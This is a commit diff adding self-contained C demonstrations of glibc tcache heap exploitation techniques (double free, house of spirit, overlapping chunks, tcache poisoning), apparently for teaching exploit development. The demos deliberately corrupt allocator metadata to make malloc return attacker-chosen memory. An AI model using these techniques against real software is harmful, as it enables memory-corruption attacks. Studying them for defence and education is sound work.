finish 4.14_glibc_tcache

src/Others/4.14_glibc_tcache/Makefile

@@ -0,0 +1,6 @@
+PROGRAMS = tcache_poisoning tcache_overlapping_chunks tcache_house_of_spirit tcache_dup
+CFLAGS += -Wpedantic -std=gnu11 -g 
+
+all: $(PROGRAMS)
+clean:
+	rm -f $(PROGRAMS)

src/Others/4.14_glibc_tcache/tcache_dup.c

@@ -3,11 +3,11 @@
 
 int main() {
     void *p1 = malloc(0x10);
-    printf("1st malloc(0x10): %p\n", p1);
-    printf("Freeing the first one\n");
+    fprintf(stderr, "1st malloc(0x10): %p\n", p1);
+    fprintf(stderr, "Freeing the first one\n");
     free(p1);
-    printf("Freeing the first one again\n");
+    fprintf(stderr, "Freeing the first one again\n");
     free(p1);
-    printf("2nd malloc(0x10): %p\n", malloc(0x10));
-    printf("3rd malloc(0x10): %p\n", malloc(0x10));
+    fprintf(stderr, "2nd malloc(0x10): %p\n", malloc(0x10));
+    fprintf(stderr, "3rd malloc(0x10): %p\n", malloc(0x10));
 }

src/Others/4.14_glibc_tcache/tcache_house_of_spirit.c

@@ -0,0 +1,27 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main() {
+    malloc(1);  // init heap
+
+    fprintf(stderr, "We will overwrite a pointer to point to a fake 'smallbin' region.\n");
+    unsigned long long *a, *b;
+    unsigned long long fake_chunk[64] __attribute__ ((aligned (16)));
+
+    fprintf(stderr, "The chunk:  %p\n", &fake_chunk[0]);
+
+    fake_chunk[1] = 0x110;  // the size
+    memset(fake_chunk+2, 0x41, sizeof(fake_chunk)-0x10);
+
+    fprintf(stderr, "Overwritting our pointer with the address of the fake region inside the fake chunk, %p.\n", &fake_chunk[0]);
+    a = &fake_chunk[2];
+
+    fprintf(stderr, "Freeing the overwritten pointer.\n");
+    free(a);
+
+    fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunk[0], &fake_chunk[2]);
+    b = malloc(0x100);
+    memset(fake_chunk+2, 0x42, sizeof(fake_chunk)-0x10);
+    fprintf(stderr, "malloc(0x100): %p\n", b);
+}

src/Others/4.14_glibc_tcache/tcache_overlapping_chunks.c

@@ -0,0 +1,28 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+
+int main() {
+    intptr_t *p1, *p2, *p3;
+
+    p1 = malloc(0x50 - 8);
+    p2 = malloc(0x20 - 8);
+    memset(p1, 0x41, 0x50-8);
+    memset(p2, 0x41, 0x30-8);
+    fprintf(stderr, "Allocated victim chunk with requested size 0x48: %p\n", p1);
+    fprintf(stderr, "Allocated sentry element after victim: %p\n", p2);
+
+    int evil_chunk_size = 0x110;
+    int evil_region_size = 0x110 - 8;
+    fprintf(stderr, "Emulating corruption of the victim's size to 0x110\n");
+    *(p1-1) = evil_chunk_size;
+    fprintf(stderr, "Freed victim chunk to put it in a different tcache bin\n");
+    free(p1);
+
+    p3 = malloc(evil_region_size);
+    memset(p3, 0x42, evil_region_size);
+    fprintf(stderr, "Requested a chunk of 0x100 bytes\n");
+    fprintf(stderr, "p3: %p ~ %p\n", p3, (char *)p3+evil_region_size);
+    fprintf(stderr, "p2: %p ~ %p\n", p2, (char *)p2+0x20-8);
+}

src/Others/4.14_glibc_tcache/tcache_poisoning.c

@@ -0,0 +1,26 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <string.h>
+
+int main() {
+    intptr_t *p1, *p2, *p3;
+    size_t target[10];
+    printf("Our target is a stack region at %p\n", (void *)target);
+
+    p1 = malloc(0x30);
+    memset(p1, 0x41, 0x30+8);
+    fprintf(stderr, "Allocated victim chunk with requested size 0x30 at %p\n", p1);
+
+    fprintf(stderr, "Freed victim chunk to put it in a tcache bin\n");
+    free(p1);
+    fprintf(stderr, "Emulating corruption of the next ptr\n");
+    *p1 = (int64_t)target;
+
+    fprintf(stderr, "Now we make two requests for the appropriate size so that malloc returns a chunk overlapping our target\n");
+    p2 = malloc(0x30);
+    memset(p2, 0x42, 0x30+8);
+    p3 = malloc(0x30);
+    memset(p3, 0x42, 0x30+8);
+    fprintf(stderr, "The first malloc(0x30) returned %p, the second one: %p\n", p2, p3);
+}